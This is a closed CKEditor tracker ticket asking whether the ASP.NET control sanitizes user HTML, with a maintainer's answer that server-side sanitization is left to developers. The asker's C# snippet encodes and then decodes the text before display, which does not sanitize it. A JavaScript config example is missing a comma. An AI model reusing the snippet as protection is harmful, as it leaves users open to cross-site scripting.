#14682 closed Task (wontfix)
Does CKEditor for asp.net do auto sanitization?
| Reported by: | Furkan Gözükara | Owned by: | |
|---|---|---|---|
| Priority: | Normal | Milestone: | |
| Component: | Server : ASP.Net | Version: | |
| Keywords: | Cc: |
Description
I don't see anywhere to enable sanitizer etc in the CKEditor implementation
How are we supposed to do sanitization?
here the implementation : http://docs.cksource.com/CKEditor_3.x/Developers_Guide/ASP.NET/Integration_Beginners
I am asking for asp.net
I have asp.net 4.5 and using c#
When we read and use like this does it make server side sanitization?
string str = CKEditor1.Text;
string str1 = Server.HtmlEncode(str); string str2 = Server.HtmlDecode(str); lblText.Text = str2;
Change History (6)
comment:1 Changed 8 years ago by
comment:2 Changed 8 years ago by
| Resolution: | → wontfix |
|---|---|
| Status: | new → closed |
| Version: | 4.5.10 (GitHub - master) |
No, there is none. As you probably know there isn’t any good library or standard for ASP.NET that does sanitization. This results in different approaches and also different requirements specific to the given application. This was the main reason why we haven’t decided to introduce any such solution. Developers should do this on their own according to their needs.
NOTE: If you are familiar with JavaScript (even a little bit) and you don’t have requirement to use ASP.NET controls in your code, I would recommend switching to CKEditor 4.5.9 JavaScript. It takes less space and if you want to integrate it into your HTML page, the code to do that is even one line long. e.g.
<script>
var editor = CKEDITOR.replace('textarea-id');
</script>
or
<script>
var editor = CKEDITOR.replace('textarea-id', {
//custom instance specific configuration goes here
lang : 'en'
color : 'blue'
});
</script>
comment:3 Changed 8 years ago by
j.swiderski ty for reply. In this case, how can i print safely the client response?
I mean i will use ckeditor for private message system.
Assume that client A sent malicious message to client B
So how can i show this message safely to client B?
Thank you
comment:4 Changed 8 years ago by
CKEditor has nothing to do with sending data. I assume that data will be exchanged between clients with the usage of server-side and this is the place where you should perform sanitization after receiving data from client side.
From CKEditor point of view you can use ACF which allows you defining which tags, attributes styles and classes can be used in the editor. For more information, please see:
http://docs.ckeditor.com/#!/guide/dev_acf
http://docs.ckeditor.com/#!/guide/dev_advanced_content_filter
http://docs.ckeditor.com/#!/guide/dev_disallowed_content
http://docs.ckeditor.com/#!/api/CKEDITOR.filter-method-addTransformations
http://docs.ckeditor.com/#!/api/CKEDITOR.config-cfg-allowedContent
http://docs.ckeditor.com/#!/api/CKEDITOR.config-cfg-extraAllowedContent
Please remember that ACF is not a security filter and you should never rely on JavaScript to do it. Such operations always need to be performed on server side (even if you additionally do it on client-side). To summarize you need to implement your custom code to do it.
comment:5 Changed 8 years ago by
Ty for answer. I see that ckeditor is useless for me because it doesn't provide any XSS security :(
comment:6 Changed 8 years ago by
CKEditor JavaScript is just a client-side application. The client-side protection can always be worked around so even if you have super XSS protection implemented in your JavaScript, you still need to have protection on server-side.
OK, there is ASP.NET control which could implement some server-side protection but for the reasons mentioned in comment:1 we haven't decided to do so.
Additionally your email never arrived to my gmail. Probably your mail servers are blocked. Also for my hotmail, it arrived into spam folder.